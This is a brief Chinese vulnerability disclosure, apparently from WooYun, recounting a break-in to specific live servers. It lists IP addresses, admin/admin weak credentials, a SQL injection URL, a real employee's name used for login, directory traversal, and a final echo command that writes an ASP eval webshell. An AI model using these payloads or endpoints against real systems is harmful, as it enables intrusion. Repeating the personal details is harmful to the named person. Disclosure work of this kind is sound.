WooYun.org

首先是从一个弱口令开始的 http://180.169.55.154:88/ admin/admin
进入后,有sql inj.需要登陆 http://180.169.55.154:88/Administration/DepartmentDetail.aspx?DEP_ID=18

然后在用户管理里,找到一些信息,拿找到的一个用户名:"蔡梅芳"
登陆这里:http://180.168.124.32:90/ 登陆页把默认密码也告诉我们了.
然后,又找到一个程序..http://180.168.124.150/eProcess/LoginNoAD.aspx
这个程序好,没弱口令,也没有注入.结果,找到了文件操作.http://180.168.124.150/eProcess/upfile/这里的文件查询,可以跨目录.,目录错误,会报出web路径 .于是..\..\..\..\liveflow5.3.1117Src\WebSite\LiveFlowWeb\就可以查看目录结构了.里面还有好几个上传程序,但是服务器没有解析漏洞,扩展名也限制的很严格
.

于是开始找可利用程序,又翻出一处注射.系统里降过权的Sa权限,web和sql一体.但是不影响拿shell.
果断:echo ^<%eval request^(chr^(35^)^)%^> >d:\liveflow5.3.1117Src\WebSite\LiveFlowWeb\shell.asp